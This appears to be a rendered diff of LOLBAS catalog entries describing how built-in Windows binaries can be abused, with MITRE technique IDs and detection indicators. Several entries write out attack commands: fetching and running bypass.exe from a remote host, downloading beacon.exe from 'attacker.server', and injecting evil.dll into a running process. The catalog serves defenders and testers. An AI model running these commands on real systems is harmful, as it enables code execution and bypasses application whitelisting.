- Path: c:\windows\system32\driverstore\filerepository\ki132574.inf_amd64_54c9b905b975ee55\ - Path: c:\windows\system32\driverstore\filerepository\ki132574.inf_amd64_54c9b905b975ee55\
- Path: c:\windows\system32\driverstore\filerepository\ki132869.inf_amd64_052eb72d070df60f\ - Path: c:\windows\system32\driverstore\filerepository\ki132869.inf_amd64_052eb72d070df60f\
- Path: c:\windows\system32\driverstore\filerepository\kit126731.inf_amd64_1905c9d5f38631d9\ - Path: c:\windows\system32\driverstore\filerepository\kit126731.inf_amd64_1905c9d5f38631d9\
Detection: Detection:
- IOC: Usually GfxDownloadWrapper downloads a JSON file from https://gameplayapi.intel.com. - IOC: Usually GfxDownloadWrapper downloads a JSON file from https://gameplayapi.intel.com.
Resources: Resources:
- Link: https://www.sothis.tech/author/jgalvez/ - Link: https://www.sothis.tech/author/jgalvez/

View File

@ -1,8 +1,8 @@
--- ---
Name: Gpscript.exe Name: Gpscript.exe
Description: Used by group policy to process scripts Description: Used by group policy to process scripts
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: Gpscript /logon - Command: Gpscript /logon
Description: Executes logon scripts configured in Group Policy. Description: Executes logon scripts configured in Group Policy.
@ -23,7 +23,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\gpscript.exe - Path: C:\Windows\System32\gpscript.exe
- Path: C:\Windows\SysWOW64\gpscript.exe - Path: C:\Windows\SysWOW64\gpscript.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: Scripts added in local group policy - IOC: Scripts added in local group policy
@ -33,4 +33,4 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
--- ---

View File

@ -2,7 +2,7 @@
Name: Hh.exe Name: Hh.exe
Description: Binary used for processing chm files in Windows Description: Binary used for processing chm files in Windows
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: HH.exe http://some.url/script.ps1 - Command: HH.exe http://some.url/script.ps1
Description: Open the target PowerShell script with HTML Help. Description: Open the target PowerShell script with HTML Help.
@ -23,7 +23,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\hh.exe - Path: C:\Windows\System32\hh.exe
- Path: C:\Windows\SysWOW64\hh.exe - Path: C:\Windows\SysWOW64\hh.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: hh.exe should normally not be in use on a normal workstation - IOC: hh.exe should normally not be in use on a normal workstation
@ -32,4 +32,4 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
--- ---

View File

@ -0,0 +1,22 @@
---
Name: IMEWDBLD.exe
Description: Microsoft IME Open Extended Dictionary Module
Author: 'Wade Hickey'
Created: '2020-03-05'
Commands:
- Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw
Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>
Usecase: Download file from Internet
Category: Download
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows 10
Full_Path:
- Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe
Resources:
- Link: https://twitter.com/notwhickey/status/1367493406835040265
Acknowledgement:
- Person: Wade Hickey
Handle: '@notwhickey'
---

View File

@ -1,8 +1,8 @@
--- ---
Name: Ie4uinit.exe Name: Ie4uinit.exe
Description: Description:
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: ie4uinit.exe -BaseSettings - Command: ie4uinit.exe -BaseSettings
Description: Executes commands from a specially prepared ie4uinit.inf file. Description: Executes commands from a specially prepared ie4uinit.inf file.
@ -17,7 +17,7 @@ Full_Path:
- Path: c:\windows\sysWOW64\ie4uinit.exe - Path: c:\windows\sysWOW64\ie4uinit.exe
- Path: c:\windows\system32\ieuinit.inf - Path: c:\windows\system32\ieuinit.inf
- Path: c:\windows\sysWOW64\ieuinit.inf - Path: c:\windows\sysWOW64\ieuinit.inf
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: ie4uinit.exe loading a inf file from outside %windir% - IOC: ie4uinit.exe loading a inf file from outside %windir%
@ -26,4 +26,4 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Jimmy - Person: Jimmy
Handle: '@bohops' Handle: '@bohops'
--- ---

View File

@ -2,9 +2,9 @@
Name: Ieexec.exe Name: Ieexec.exe
Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL. Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL.
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
Description: Downloads and executes bypass.exe from the remote server. Description: Downloads and executes bypass.exe from the remote server.
Usecase: Download and run attacker code from remote location Usecase: Download and run attacker code from remote location
Category: Download Category: Download
@ -12,7 +12,7 @@ Commands:
MitreID: T1105 MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105 MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
Description: Downloads and executes bypass.exe from the remote server. Description: Downloads and executes bypass.exe from the remote server.
Usecase: Download and run attacker code from remote location Usecase: Download and run attacker code from remote location
Category: Execute Category: Execute
@ -23,13 +23,13 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: - IOC:
Resources: Resources:
- Link: https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/ - Link: https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
Acknowledgement: Acknowledgement:
- Person: Casey Smith - Person: Casey Smith
Handle: '@subtee' Handle: '@subtee'
--- ---

View File

@ -2,7 +2,7 @@
Name: Ilasm.exe Name: Ilasm.exe
Description: used for compile c# code into dll or exe. Description: used for compile c# code into dll or exe.
Author: Hai vaknin (lux) Author: Hai vaknin (lux)
Created: 17/03/2020 Created: 2020-03-17
Commands: Commands:
- Command: ilasm.exe C:\public\test.txt /exe - Command: ilasm.exe C:\public\test.txt /exe
Description: Binary file used by .NET to compile c# code to .exe Description: Binary file used by .NET to compile c# code to .exe
@ -11,7 +11,7 @@ Commands:
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127
MitreLink: https://attack.mitre.org/techniques/T1127/ MitreLink: https://attack.mitre.org/techniques/T1127/
OperatingSystem: Windows 10,7 OperatingSystem: Windows 10,7
- Command: ilasm.exe C:\public\test.txt /dll - Command: ilasm.exe C:\public\test.txt /dll
Description: Binary file used by .NET to compile c# code to dll Description: Binary file used by .NET to compile c# code to dll
Usecase: A description of the usecase Usecase: A description of the usecase
@ -22,7 +22,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
Code_Sample: Code_Sample:
- Code: - Code:
Resources: Resources:
- Link: https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt - Link: https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt

View File

@ -2,7 +2,7 @@
Name: Infdefaultinstall.exe Name: Infdefaultinstall.exe
Description: Binary used to perform installation based on content inside inf files Description: Binary used to perform installation based on content inside inf files
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: InfDefaultInstall.exe Infdefaultinstall.inf - Command: InfDefaultInstall.exe Infdefaultinstall.inf
Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file. Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.
@ -15,7 +15,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\Infdefaultinstall.exe - Path: C:\Windows\System32\Infdefaultinstall.exe
- Path: C:\Windows\SysWOW64\Infdefaultinstall.exe - Path: C:\Windows\SysWOW64\Infdefaultinstall.exe
Code_Sample: Code_Sample:
- Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a - Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
Detection: Detection:
- IOC: - IOC:
@ -25,4 +25,4 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Kyle Hanslovan - Person: Kyle Hanslovan
Handle: '@kylehanslovan' Handle: '@kylehanslovan'
--- ---

View File

@ -2,7 +2,7 @@
Name: Installutil.exe Name: Installutil.exe
Description: The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies Description: The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
Description: Execute the target .NET DLL or EXE. Description: Execute the target .NET DLL or EXE.
@ -25,7 +25,7 @@ Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: - IOC:
@ -39,4 +39,4 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Casey Smith - Person: Casey Smith
Handle: '@subtee' Handle: '@subtee'
--- ---

View File

@ -2,7 +2,7 @@
Name: Jsc.exe Name: Jsc.exe
Description: Binary file used by .NET to compile javascript code to .exe or .dll format Description: Binary file used by .NET to compile javascript code to .exe or .dll format
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2019-05-31' Created: 2019-05-31
Commands: Commands:
- Command: jsc.exe scriptfile.js - Command: jsc.exe scriptfile.js
Description: Use jsc.exe to compile javascript code stored in scriptfile.js and output scriptfile.exe. Description: Use jsc.exe to compile javascript code stored in scriptfile.js and output scriptfile.exe.
@ -25,14 +25,14 @@ Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Jsc.exe - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Jsc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Jsc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Jsc.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: Jsc.exe should normally not run a system unless it is used for development. - IOC: Jsc.exe should normally not run a system unless it is used for development.
Resources: Resources:
- Link: https://twitter.com/DissectMalware/status/998797808907046913 - Link: https://twitter.com/DissectMalware/status/998797808907046913
- Link: https://www.phpied.com/make-your-javascript-a-windows-exe/ - Link: https://www.phpied.com/make-your-javascript-a-windows-exe/
Acknowledgement: Acknowledgement:
- Person: Malwrologist - Person: Malwrologist
Handle: '@DissectMalware' Handle: '@DissectMalware'
--- ---

View File

@ -2,7 +2,7 @@
Name: Makecab.exe Name: Makecab.exe
Description: Binary to package existing files into a cabinet (.cab) file Description: Binary to package existing files into a cabinet (.cab) file
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab - Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file. Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
@ -31,7 +31,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\makecab.exe - Path: C:\Windows\System32\makecab.exe
- Path: C:\Windows\SysWOW64\makecab.exe - Path: C:\Windows\SysWOW64\makecab.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: Makecab getting files from Internet - IOC: Makecab getting files from Internet
@ -41,4 +41,4 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
--- ---

View File

@ -2,7 +2,7 @@
Name: Mavinject.exe Name: Mavinject.exe
Description: Used by App-v in Windows Description: Used by App-v in Windows
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll - Command: MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll
Description: Inject evil.dll into a process with PID 3110. Description: Inject evil.dll into a process with PID 3110.
@ -23,7 +23,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\mavinject.exe - Path: C:\Windows\System32\mavinject.exe
- Path: C:\Windows\SysWOW64\mavinject.exe - Path: C:\Windows\SysWOW64\mavinject.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: mavinject.exe should not run unless APP-v is in use on the workstation - IOC: mavinject.exe should not run unless APP-v is in use on the workstation
@ -36,4 +36,4 @@ Acknowledgement:
Handle: '@gN3mes1s' Handle: '@gN3mes1s'
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
--- ---

View File

@ -2,7 +2,7 @@
Name: Microsoft.Workflow.Compiler.exe Name: Microsoft.Workflow.Compiler.exe
Description: A utility included with .NET that is capable of compiling and executing C# or VB.net code. Description: A utility included with .NET that is capable of compiling and executing C# or VB.net code.
Author: 'Conor Richard' Author: 'Conor Richard'
Created: '2018-10-22' Created: 2018-10-22
Commands: Commands:
- Command: Microsoft.Workflow.Compiler.exe tests.xml results.xml - Command: Microsoft.Workflow.Compiler.exe tests.xml results.xml
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.xml file. Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.xml file.
@ -19,7 +19,7 @@ Commands:
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127
MitreLink: https://attack.mitre.org/wiki/Technique/T1127 MitreLink: https://attack.mitre.org/wiki/Technique/T1127
OperatingSystem: Windows 10S OperatingSystem: Windows 10S
- Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
Usecase: Compile and run code Usecase: Compile and run code
@ -27,10 +27,10 @@ Commands:
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127
MitreLink: https://attack.mitre.org/wiki/Technique/T1127 MitreLink: https://attack.mitre.org/wiki/Technique/T1127
OperatingSystem: Windows 10S OperatingSystem: Windows 10S
Full_Path: Full_Path:
- Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe - Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: Microsoft.Workflow.Compiler.exe would not normally be run on workstations. - IOC: Microsoft.Workflow.Compiler.exe would not normally be run on workstations.
@ -53,4 +53,4 @@ Acknowledgement:
Handle: '@FortyNorthSec' Handle: '@FortyNorthSec'
- Person: Bank Security - Person: Bank Security
Handle: '@Bank_Security' Handle: '@Bank_Security'
--- ---

View File

@ -2,7 +2,7 @@
Name: Mmc.exe Name: Mmc.exe
Description: Load snap-ins to locally and remotely manage Windows systems Description: Load snap-ins to locally and remotely manage Windows systems
Author: '@bohops' Author: '@bohops'
Created: '2018-12-04' Created: 2018-12-04
Commands: Commands:
- Command: mmc.exe -Embedding c:\path\to\test.msc - Command: mmc.exe -Embedding c:\path\to\test.msc
Description: Launch a 'backgrounded' MMC process and invoke a COM payload Description: Launch a 'backgrounded' MMC process and invoke a COM payload
@ -15,10 +15,10 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\mmc.exe - Path: C:\Windows\System32\mmc.exe
- Path: C:\Windows\SysWOW64\mmc.exe - Path: C:\Windows\SysWOW64\mmc.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: - IOC:
Resources: Resources:
- Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ - Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
Acknowledgement: Acknowledgement:

View File

@ -2,7 +2,7 @@
Name: MpCmdRun.exe Name: MpCmdRun.exe
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender Description: Binary part of Windows Defender. Used to manage settings in Windows Defender
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '09/03/2020' Created: 2020-03-20
Commands: Commands:
- Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe
Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path) Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path)
@ -32,9 +32,9 @@ Full_Path:
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.7-0\MpCmdRun.exe - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.7-0\MpCmdRun.exe
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: MpCmdRun storing data into alternate data streams. - IOC: MpCmdRun storing data into alternate data streams.
- IOC: MpCmdRun getting a file from a remote machine or the internet that is not expected. - IOC: MpCmdRun getting a file from a remote machine or the internet that is not expected.
- IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe. - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe.
@ -54,4 +54,4 @@ Acknowledgement:
Handle: '' Handle: ''
- Person: Cedric - Person: Cedric
Handle: '@th3c3dr1c' Handle: '@th3c3dr1c'
--- ---

View File

@ -1,8 +1,8 @@
--- ---
Name: Msbuild.exe Name: Msbuild.exe
Description: Used to compile and execute code Description: Used to compile and execute code
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: msbuild.exe pshell.xml - Command: msbuild.exe pshell.xml
Description: Build and execute a C# project stored in the target XML file. Description: Build and execute a C# project stored in the target XML file.
@ -20,6 +20,14 @@ Commands:
MitreID: T1127 MitreID: T1127
MitreLink: https://attack.mitre.org/wiki/Technique/T1127 MitreLink: https://attack.mitre.org/wiki/Technique/T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: msbuild.exe project.proj
Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+.
Usecase: Execute project file that contains XslTransformation tag parameters
Category: Execute
Privileges: User
MitreID: T1127
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path: Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe
@ -27,8 +35,9 @@ Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
- Path: C:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: Msbuild.exe should not normally be executed on workstations - IOC: Msbuild.exe should not normally be executed on workstations
Resources: Resources:
@ -36,9 +45,12 @@ Resources:
- Link: https://github.com/Cn33liz/MSBuildShell - Link: https://github.com/Cn33liz/MSBuildShell
- Link: https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/ - Link: https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/
- Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
- Link: https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191
Acknowledgement: Acknowledgement:
- Person: Casey Smith - Person: Casey Smith
Handle: '@subtee' Handle: '@subtee'
- Person: Cn33liz - Person: Cn33liz
Handle: '@Cneelis' Handle: '@Cneelis'
- Person: Jimmy
Handle: '@bohops'
--- ---

View File

@ -2,7 +2,7 @@
Name: Msconfig.exe Name: Msconfig.exe
Description: MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows Description: MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: Msconfig.exe -5 - Command: Msconfig.exe -5
Description: Executes command embeded in crafted c:\windows\system32\mscfgtlc.xml. Description: Executes command embeded in crafted c:\windows\system32\mscfgtlc.xml.
@ -14,7 +14,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path: Full_Path:
- Path: C:\Windows\System32\msconfig.exe - Path: C:\Windows\System32\msconfig.exe
Code_Sample: Code_Sample:
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/mscfgtlc.xml - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/mscfgtlc.xml
Detection: Detection:
- IOC: mscfgtlc.xml changes in system32 folder - IOC: mscfgtlc.xml changes in system32 folder
@ -24,4 +24,4 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Pierre-Alexandre Braeken - Person: Pierre-Alexandre Braeken
Handle: '@pabraeken' Handle: '@pabraeken'
--- ---

View File

@ -1,8 +1,8 @@
--- ---
Name: Msdt.exe Name: Msdt.exe
Description: Microsoft diagnostics tool Description: Microsoft diagnostics tool
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
@ -23,15 +23,15 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\Msdt.exe - Path: C:\Windows\System32\Msdt.exe
- Path: C:\Windows\SysWOW64\Msdt.exe - Path: C:\Windows\SysWOW64\Msdt.exe
Code_Sample: Code_Sample:
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/PCW8E57.xml - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/PCW8E57.xml
Detection: Detection:
- IOC: - IOC:
Resources: Resources:
- Link: https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/ - Link: https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
- Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ - Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
- Link: https://twitter.com/harr0ey/status/991338229952598016 - Link: https://twitter.com/harr0ey/status/991338229952598016
Acknowledgement: Acknowledgement:
- Person: - Person:
Handle: Handle:
--- ---

View File

@ -2,7 +2,7 @@
Name: Mshta.exe Name: Mshta.exe
Description: Used by Windows to execute html applications. (.hta) Description: Used by Windows to execute html applications. (.hta)
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: mshta.exe evilfile.hta - Command: mshta.exe evilfile.hta
Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
@ -39,7 +39,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\mshta.exe - Path: C:\Windows\System32\mshta.exe
- Path: C:\Windows\SysWOW64\mshta.exe - Path: C:\Windows\SysWOW64\mshta.exe
Code_Sample: Code_Sample:
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct
Detection: Detection:
- IOC: mshta.exe executing raw or obfuscated script within the command-line - IOC: mshta.exe executing raw or obfuscated script within the command-line
@ -48,10 +48,10 @@ Resources:
- Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4 - Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4
- Link: https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct
- Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ - Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
- Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
Acknowledgement: Acknowledgement:
- Person: Casey Smith - Person: Casey Smith
Handle: '@subtee' Handle: '@subtee'
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
--- ---

View File

@ -2,7 +2,7 @@
Name: Msiexec.exe Name: Msiexec.exe
Description: Used by Windows to execute msi files Description: Used by Windows to execute msi files
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: msiexec /quiet /i cmd.msi - Command: msiexec /quiet /i cmd.msi
Description: Installs the target .MSI file silently. Description: Installs the target .MSI file silently.
